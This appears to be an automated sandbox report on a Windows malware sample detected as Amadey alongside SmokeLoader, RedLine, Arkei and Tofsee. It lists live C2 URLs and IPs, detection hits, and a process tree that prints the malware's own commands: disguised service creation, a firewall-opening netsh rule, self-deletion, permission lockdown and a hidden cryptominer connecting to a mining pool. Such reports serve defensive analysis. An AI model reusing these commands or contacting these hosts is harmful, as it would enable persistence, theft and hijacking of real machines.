amadey | 6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777

Analysis

max time kernel
130s
max time network
173s
platform
windows7_x64
resource
win7-en-20211104
submitted
30-11-2021 12:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
Size

158KB
MD5

b26f43029e309d92f30a759b754dfcf2
SHA1

2464a02db019c27964a08d7d51c3ecc49f179b26
SHA256

6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777
SHA512

5595275af5aec55fb8917c8d04b6dbe2315d0e6d73cc6426ca7a3f6b99d6d08d02f74e785923409328e95412ebadd47f1fa88e72d473810c02d716d44d791d31

Score

10^/10

amadey arkei cryptbot redline smokeloader tofsee default backdoor evasion infostealer persistence spyware stealer suricata themida trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://host-data-coin-11.com/

http://file-coin-host-12.com/

rc4.i32

Extracted

Family

tofsee

quadoil.ru

lakeflex.ru

Extracted

Family

redline

92.255.76.197:38637

Extracted

Family

arkei

Botnet

Default

http://file-file-host4.com/tratata.php

Extracted

Family

amadey

Version

2.85

185.215.113.35/d2VxjasuwS/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Arkei
Arkei is an infostealer written in C++.
stealer arkei
CryptBot
A C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 6 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1968-94-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/1968-96-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/1968-95-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/1968-97-0x0000000000418EE6-mapping.dmp	family_redline
behavioral1/memory/1968-99-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/1960-150-0x00000000001C0000-0x00000000002B4000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata

Arkei Stealer Payload 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/936-104-0x0000000000280000-0x00000000002A1000-memory.dmp	family_arkei
behavioral1/memory/936-106-0x0000000000400000-0x0000000002B6F000-memory.dmp	family_arkei

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file
Executes dropped EXE 9 IoCs

Processes:

B73E.exeB73E.exeBAE7.exeBE61.exeC536.exeCAD2.exeBE61.exemewdctel.exeDF8B.exe

pid process

640 B73E.exe
1976 B73E.exe
1960 BAE7.exe
1624 BE61.exe
1540 C536.exe
936 CAD2.exe
1968 BE61.exe
1640 mewdctel.exe
988 DF8B.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

pid	process
640	B73E.exe
1976	B73E.exe
1960	BAE7.exe
1624	BE61.exe
1540	C536.exe
936	CAD2.exe
1968	BE61.exe
1640	mewdctel.exe
988	DF8B.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

DF8B.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	DF8B.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	DF8B.exe

Deletes itself 1 IoCs

Processes:

pid process

1380
Loads dropped DLL 2 IoCs

Processes:

B73E.exeBE61.exe

pid process

640 B73E.exe
1624 BE61.exe

pid	process
1380

pid	process
640	B73E.exe
1624	BE61.exe

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\DF8B.exe	themida
behavioral1/memory/988-118-0x0000000001270000-0x0000000001952000-memory.dmp	themida
behavioral1/memory/988-119-0x0000000001270000-0x0000000001952000-memory.dmp	themida
behavioral1/memory/988-120-0x0000000001270000-0x0000000001952000-memory.dmp	themida
behavioral1/memory/988-121-0x0000000001270000-0x0000000001952000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\DF8B.exe	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

DF8B.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA DF8B.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

DF8B.exe

pid process

988 DF8B.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	DF8B.exe

pid	process
988	DF8B.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exeB73E.exeBE61.exe

description	pid	process	target process
PID 780 set thread context of 1308	780	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
PID 640 set thread context of 1976	640	B73E.exe	B73E.exe
PID 1624 set thread context of 1968	1624	BE61.exe	BE61.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

B73E.exe6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	B73E.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	B73E.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	B73E.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

DF8B.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	DF8B.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	DF8B.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

992 timeout.exe

pid	process
992	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe

pid	process
1308	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
1308	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1380
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exeB73E.exe

pid process

1308 6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
1976 B73E.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

description pid process

Token: SeShutdownPrivilege 1380
Token: SeShutdownPrivilege 1380
Token: SeShutdownPrivilege 1380
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid process

1380
1380
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pid process

1380
1380

pid	process
1380

description	pid	process
Token: SeShutdownPrivilege	1380
Token: SeShutdownPrivilege	1380
Token: SeShutdownPrivilege	1380

pid	process
1380
1380

pid	process
1380
1380

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exeB73E.exeBE61.exeBAE7.exe

description	pid	process	target process
PID 780 wrote to memory of 1308	780	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
PID 780 wrote to memory of 1308	780	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
PID 780 wrote to memory of 1308	780	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
PID 780 wrote to memory of 1308	780	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
PID 780 wrote to memory of 1308	780	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
PID 780 wrote to memory of 1308	780	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
PID 780 wrote to memory of 1308	780	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe	6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
PID 1380 wrote to memory of 640	1380		B73E.exe
PID 1380 wrote to memory of 640	1380		B73E.exe
PID 1380 wrote to memory of 640	1380		B73E.exe
PID 1380 wrote to memory of 640	1380		B73E.exe
PID 640 wrote to memory of 1976	640	B73E.exe	B73E.exe
PID 640 wrote to memory of 1976	640	B73E.exe	B73E.exe
PID 640 wrote to memory of 1976	640	B73E.exe	B73E.exe
PID 640 wrote to memory of 1976	640	B73E.exe	B73E.exe
PID 640 wrote to memory of 1976	640	B73E.exe	B73E.exe
PID 640 wrote to memory of 1976	640	B73E.exe	B73E.exe
PID 640 wrote to memory of 1976	640	B73E.exe	B73E.exe
PID 1380 wrote to memory of 1960	1380		BAE7.exe
PID 1380 wrote to memory of 1960	1380		BAE7.exe
PID 1380 wrote to memory of 1960	1380		BAE7.exe
PID 1380 wrote to memory of 1960	1380		BAE7.exe
PID 1380 wrote to memory of 1624	1380		BE61.exe
PID 1380 wrote to memory of 1624	1380		BE61.exe
PID 1380 wrote to memory of 1624	1380		BE61.exe
PID 1380 wrote to memory of 1624	1380		BE61.exe
PID 1624 wrote to memory of 1968	1624	BE61.exe	BE61.exe
PID 1624 wrote to memory of 1968	1624	BE61.exe	BE61.exe
PID 1624 wrote to memory of 1968	1624	BE61.exe	BE61.exe
PID 1624 wrote to memory of 1968	1624	BE61.exe	BE61.exe
PID 1380 wrote to memory of 1540	1380		C536.exe
PID 1380 wrote to memory of 1540	1380		C536.exe
PID 1380 wrote to memory of 1540	1380		C536.exe
PID 1380 wrote to memory of 1540	1380		C536.exe
PID 1380 wrote to memory of 936	1380		CAD2.exe
PID 1380 wrote to memory of 936	1380		CAD2.exe
PID 1380 wrote to memory of 936	1380		CAD2.exe
PID 1380 wrote to memory of 936	1380		CAD2.exe
PID 1624 wrote to memory of 1968	1624	BE61.exe	BE61.exe
PID 1624 wrote to memory of 1968	1624	BE61.exe	BE61.exe
PID 1624 wrote to memory of 1968	1624	BE61.exe	BE61.exe
PID 1624 wrote to memory of 1968	1624	BE61.exe	BE61.exe
PID 1624 wrote to memory of 1968	1624	BE61.exe	BE61.exe
PID 1960 wrote to memory of 2036	1960	BAE7.exe	cmd.exe
PID 1960 wrote to memory of 2036	1960	BAE7.exe	cmd.exe
PID 1960 wrote to memory of 2036	1960	BAE7.exe	cmd.exe
PID 1960 wrote to memory of 2036	1960	BAE7.exe	cmd.exe
PID 1960 wrote to memory of 960	1960	BAE7.exe	cmd.exe
PID 1960 wrote to memory of 960	1960	BAE7.exe	cmd.exe
PID 1960 wrote to memory of 960	1960	BAE7.exe	cmd.exe
PID 1960 wrote to memory of 960	1960	BAE7.exe	cmd.exe
PID 1960 wrote to memory of 1176	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 1176	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 1176	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 1176	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 876	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 876	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 876	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 876	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 1400	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 1400	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 1400	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 1400	1960	BAE7.exe	sc.exe
PID 1960 wrote to memory of 1632	1960	BAE7.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
"C:\Users\Admin\AppData\Local\Temp\6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:780
- C:\Users\Admin\AppData\Local\Temp\6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe
  "C:\Users\Admin\AppData\Local\Temp\6d960492cd435b33c4a7e80919cdbbb15826b8931fef1700273a25ee203d4777.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1308

C:\Users\Admin\AppData\Local\Temp\B73E.exe
C:\Users\Admin\AppData\Local\Temp\B73E.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:640
- C:\Users\Admin\AppData\Local\Temp\B73E.exe
  C:\Users\Admin\AppData\Local\Temp\B73E.exe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1976

C:\Users\Admin\AppData\Local\Temp\BAE7.exe
C:\Users\Admin\AppData\Local\Temp\BAE7.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1960
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mxmhsmla\
  2⤵
  PID:2036
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mewdctel.exe" C:\Windows\SysWOW64\mxmhsmla\
  2⤵
  PID:960
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create mxmhsmla binPath= "C:\Windows\SysWOW64\mxmhsmla\mewdctel.exe /d\"C:\Users\Admin\AppData\Local\Temp\BAE7.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:1176
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description mxmhsmla "wifi internet conection"
  2⤵
  PID:876
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start mxmhsmla
  2⤵
  PID:1400
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:1632

C:\Users\Admin\AppData\Local\Temp\BE61.exe
C:\Users\Admin\AppData\Local\Temp\BE61.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1624
- C:\Users\Admin\AppData\Local\Temp\BE61.exe
  C:\Users\Admin\AppData\Local\Temp\BE61.exe
  2⤵
  - Executes dropped EXE
  PID:1968

C:\Users\Admin\AppData\Local\Temp\C536.exe
C:\Users\Admin\AppData\Local\Temp\C536.exe
1⤵
- Executes dropped EXE
PID:1540

C:\Users\Admin\AppData\Local\Temp\CAD2.exe
C:\Users\Admin\AppData\Local\Temp\CAD2.exe
1⤵
- Executes dropped EXE
PID:936

C:\Windows\SysWOW64\mxmhsmla\mewdctel.exe
C:\Windows\SysWOW64\mxmhsmla\mewdctel.exe /d"C:\Users\Admin\AppData\Local\Temp\BAE7.exe"
1⤵
- Executes dropped EXE
PID:1640
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:1876
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:1200

C:\Users\Admin\AppData\Local\Temp\DF8B.exe
C:\Users\Admin\AppData\Local\Temp\DF8B.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:988
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\eUCsfqTtbmbrM & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DF8B.exe"
  2⤵
  PID:1132
- - C:\Windows\SysWOW64\timeout.exe
    timeout 4
    3⤵
    - Delays execution with timeout.exe
    PID:992

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\E9C9.dll
1⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\F713.exe
C:\Users\Admin\AppData\Local\Temp\F713.exe
1⤵
PID:920
- C:\Users\Admin\AppData\Local\Temp\F713.exe
  C:\Users\Admin\AppData\Local\Temp\F713.exe
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:N"
    3⤵
    PID:704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:1736
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:N"
      4⤵
      PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:R" /E
    3⤵
    PID:1152
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:R" /E
      4⤵
      PID:1132
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:N"
    3⤵
    PID:2064
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:2112
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:N"
      4⤵
      PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:R" /E
    3⤵
    PID:2148
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:R" /E
      4⤵
      PID:2180
- - C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
    "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe"
    3⤵
    PID:2216
  - - C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
      C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
      4⤵
      PID:2272

C:\Users\Admin\AppData\Local\Temp\170.exe
C:\Users\Admin\AppData\Local\Temp\170.exe
1⤵
PID:1960

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Privilege Escalation

New Service

T1050

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\170.exe

MD5
be4f5ce319e46b67e63b264731fd6373

SHA1
aa49a0ca93e10cc9da893bcb59489e45ef95faac

SHA256
f0c933e086e2a68844efd7ea1c165833aee7d7181bb995388db4979d4e94563b

SHA512
59c79c8184ab3f301249e117043a29d663745a2dd62dbb2c6ef42a885964a47414031af9a8f6294274f8675296f2e05edbda0a3f836990b03af4213d238503f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\170.exe

MD5
28871858d1a573fb05a94ad89d4be06f

SHA1
18707a97fd086a99e7aea3dbb8c8fa26a9c877c6

SHA256
7dbd53ad87ad3e48f9358c835edb43224ccdaf96ad937a9a6da8b516b78b4728

SHA512
c78beed25a225f9fda1cee56856a35c63ab9a75f452d13e1e67ba85b0aba231a9f6b81d1fbf6b31c32982ef9b11a3ba6c7740b515db9a72d6980947a802444b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe

MD5
766a305c8f1b391a761e591545de628d

SHA1
55755ebd5114986c1ed405fc0444f12c7a9c3423

SHA256
454be45d46a91114bc41868c596beb22ecc311f7d1867e095fcdcf37eb7cd94d

SHA512
040244d5887cf42c56bc71a5f6ff45788759b8d9ec60f36d0f69c537a314fc399d426eb613e6b7d638ae8ff1d9ccd50c93e9e6631a3b2b97e01d27020b47a217

Download Submit
C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe

MD5
ec3dd212816fad46a2e835f45c245aee

SHA1
a2b942fce352d4880f4a65a8cca91237d5d78a4a

SHA256
fb452b1488f00eb47c35b783125cb4ef2ef9c97e82ccda1c651ceaa3ee12a60e

SHA512
aee78919ceb55801d1ce4e6d0c4050804307be592a8be546db232a3cf984ab10ce6f26169ea9f06bf8e6c1a6ef486c1bac45fe412cced412f9cadbca116253e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\B73E.exe

MD5
14ed6526c66d169e798f55666d404de6

SHA1
b1ce8fba4b4dd56f73f33daf27805c8bff59f80c

SHA256
b12d114be98904ce453c97d9814e15f5147142412952b17711d6fd487f45a680

SHA512
53f39f8c57ca9e8f323939e678a7fd4fb24d49dab7a985d48e19d032a93496a98a2ae33565bb8d0ff6e829d7f32fe7491dd4845c9ed3ddf3503cec6c4e2f76e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\B73E.exe

MD5
14ed6526c66d169e798f55666d404de6

SHA1
b1ce8fba4b4dd56f73f33daf27805c8bff59f80c

SHA256
b12d114be98904ce453c97d9814e15f5147142412952b17711d6fd487f45a680

SHA512
53f39f8c57ca9e8f323939e678a7fd4fb24d49dab7a985d48e19d032a93496a98a2ae33565bb8d0ff6e829d7f32fe7491dd4845c9ed3ddf3503cec6c4e2f76e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\B73E.exe

MD5
14ed6526c66d169e798f55666d404de6

SHA1
b1ce8fba4b4dd56f73f33daf27805c8bff59f80c

SHA256
b12d114be98904ce453c97d9814e15f5147142412952b17711d6fd487f45a680

SHA512
53f39f8c57ca9e8f323939e678a7fd4fb24d49dab7a985d48e19d032a93496a98a2ae33565bb8d0ff6e829d7f32fe7491dd4845c9ed3ddf3503cec6c4e2f76e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\BAE7.exe

MD5
e7f606299a819430be235ed185050de1

SHA1
73a88c1712d1c91731f7557c4a023b1599c5ac6c

SHA256
4f140797fa904582e8422edd3bc1c661b72a1a1ee23a329173017e20901e25ca

SHA512
cc78cd7711c2eaa7ed3ba52f77fdb02096bca1c35dbfff3576aa72d7273dfb7fa388b51c605188c7c66fa2cdc7d4d48b6d1652bc390de5e91ec2a97455e95c12

Download Submit
C:\Users\Admin\AppData\Local\Temp\BAE7.exe

MD5
e7f606299a819430be235ed185050de1

SHA1
73a88c1712d1c91731f7557c4a023b1599c5ac6c

SHA256
4f140797fa904582e8422edd3bc1c661b72a1a1ee23a329173017e20901e25ca

SHA512
cc78cd7711c2eaa7ed3ba52f77fdb02096bca1c35dbfff3576aa72d7273dfb7fa388b51c605188c7c66fa2cdc7d4d48b6d1652bc390de5e91ec2a97455e95c12

Download Submit
C:\Users\Admin\AppData\Local\Temp\BE61.exe

MD5
5115e5dab211559a85cd0154e8100f53

SHA1
347800b72ac53ec6e2c87e433763b20282a2c06d

SHA256
ef156fb3a203fe197d89d63e2ea7805a1b9af505dfff5a58532dbfe34e7aabaa

SHA512
d03e58376be1e299a6da57a28ed5db176999baded713aa54ddb59cf8c82b97e8c0b028ce07bddb6989c7c77e518e151e112dde2f1d5244ac2572e4371fa68c12

Download Submit
C:\Users\Admin\AppData\Local\Temp\BE61.exe

MD5
5115e5dab211559a85cd0154e8100f53

SHA1
347800b72ac53ec6e2c87e433763b20282a2c06d

SHA256
ef156fb3a203fe197d89d63e2ea7805a1b9af505dfff5a58532dbfe34e7aabaa

SHA512
d03e58376be1e299a6da57a28ed5db176999baded713aa54ddb59cf8c82b97e8c0b028ce07bddb6989c7c77e518e151e112dde2f1d5244ac2572e4371fa68c12

Download Submit
C:\Users\Admin\AppData\Local\Temp\BE61.exe

MD5
5115e5dab211559a85cd0154e8100f53

SHA1
347800b72ac53ec6e2c87e433763b20282a2c06d

SHA256
ef156fb3a203fe197d89d63e2ea7805a1b9af505dfff5a58532dbfe34e7aabaa

SHA512
d03e58376be1e299a6da57a28ed5db176999baded713aa54ddb59cf8c82b97e8c0b028ce07bddb6989c7c77e518e151e112dde2f1d5244ac2572e4371fa68c12

Download Submit
C:\Users\Admin\AppData\Local\Temp\C536.exe

MD5
646cc8edbe849bf17c1694d936f7ae6b

SHA1
68b8e56cd63da79a8ace5c70f22cd0a6b3672497

SHA256
836e9de6ff5057a4964402ed5a9695e270a7db9e0d8b756a99203befa70fc4b7

SHA512
92df2e2fcfc8c0c2789222966f09b1c295e2b4d2f5d86a10d513dd05749507792d3df78b5f1d605517bba86cbc48c7ba6c9b54d8aba246a1b2cc0a75f626d9d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\CAD2.exe

MD5
85572d81747be0603ac9d09799a4bd24

SHA1
06565fce8a6e95154d43c6b45bfd8d263b00db3b

SHA256
5d559dc3d22a4c388a026611e15477211e81aaf560eddf9f99d7640d28dce665

SHA512
f22b56987e27454ceafe9e1810384771b6ff86106b6f3c467dc88cd85bbf241f9e76343f60cc271898df28935fe01794490e2072e893bc404ed4907d957002fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\DF8B.exe

MD5
ca16ca4aa9cf9777274447c9f4ba222e

SHA1
1025ed93e5f44d51b96f1a788764cc4487ee477e

SHA256
0016755526279c5c404b670ecb2d81af46066d879c389924a6574ab9864b5c04

SHA512
72d8d2a729b8ce2940235d3a317ee3eb0eb8d1411e847d6d11e36484f520bb88b3cabd03716b3c2988b0a053426be14aace154f13d306883788f952cd03cf712

Download Submit
C:\Users\Admin\AppData\Local\Temp\DF8B.exe

MD5
edcee9e75c60ad2592d439563e7667ab

SHA1
2a992a4fb615d6a4c3fa090414a1a5b61bfe7ed4

SHA256
e15eaa5d0ea1628d9319542bd1e4d1ab3094e94661ab3d01502ac1d72baa1d2e

SHA512
85343722e7c9f46b67085dfd6d706578104a7363788d557620452b6a6e12bab37365eed7e1b944dd395048f7843225773267dd202b107e48685b6416d583da4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\E9C9.dll

MD5
2ee33ef3b24574c9fb54fd75e29fdf6e

SHA1
158a048f5f5feac85eb5791fbb25ba6aaf262712

SHA256
46e20b3931c4550ade3e4abd395a289621ea3f42f6aa44c90083ebb7f7be2704

SHA512
